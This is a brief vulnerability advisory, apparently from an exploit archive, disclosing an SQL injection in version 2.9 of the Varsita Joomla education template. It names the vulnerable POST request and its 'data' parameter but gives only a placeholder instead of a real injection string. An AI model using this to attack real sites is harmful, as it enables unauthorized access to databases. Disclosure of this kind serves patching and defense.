id: 29340
date: 12/30/2017
title: Joomla Varista Education 2.9 SQL Injection Vulnerability
author: pwny
cves: 

######################################################################
# Exploit Title: Varista Education Joomla Template - SQL Injection
Vulnerability
# Google Dork: N/A
# Date: 30.12.2017
# Author: Abdeljalil Nouiri (@pwny)
# url : https://www.joomshaper.com/joomla-templates/varsita
# Version : 2.9
# Tested on: Kali Linux
# proof : https://ibb.co/mo8wnG
######################################################################
#
# Description : Varsita is a multipurpose Joomla 3.6 template for all kinds
of schools, universities,courses and education business.
#
#
# Vulnerable Parameter : POST -p data
#
# http://127.0.0.1/path/
#
#POST : option=com_ajax&module=splmscoursesearch&data=[SQLi]&format=jsonp
#
#proof : https://ibb.co/mo8wnG
#
#
######################
# Discovered by : Abdeljalil Nouiri  (
https://linkedin.com/in/abdeljalil-nouiri-36a654143)
# Greetz : HackXore Team
######################

#  0day.today [2023-03-21]  #